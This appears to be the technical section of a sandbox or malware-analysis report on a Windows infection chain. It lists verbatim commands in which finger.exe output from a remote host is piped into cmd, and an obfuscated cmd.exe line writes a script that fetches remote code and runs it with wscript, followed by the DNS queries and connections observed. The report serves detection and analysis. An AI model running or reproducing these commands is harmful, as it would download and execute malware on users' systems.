Technical Information
- '<SYSTEM32>\finger.exe' ok@60oo4m.debitosativos.buzz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Sog.js"
- C:\users\public\sog.js
- '60####.#ebitosativos.buzz':79
- '39####.niyimptgikub.art':80
- '60####.#ebitosativos.buzz':79
- DNS ASK 60####.#ebitosativos.buzz
- DNS ASK 39####.niyimptgikub.art
- '<SYSTEM32>\cmd.exe' /c finger.exe ok@60oo4m.debitosativos.buzz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "Set RZFC=.j&&sET PZTNI=vE2zdarE2zd a =E2zd 'scE2zdriE2zdptE2zd:'; b =E2zd 'hE2zdTtPE2zd:'; GE2zdetE2zdObjE2zdecE2zdt(E2zda+b+'&&sET A9E6=YOWMSYOWMS39uaer.niyimptgikub.artYOWMS?1YOWMS')&...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p KR1TZ="%PZTNI:E2zd=%%A9E6:YOWMS=/%" 0<nul 1>C:\Users\Public\Sog%RZFC%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\Sog%RZFC%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\Sog.js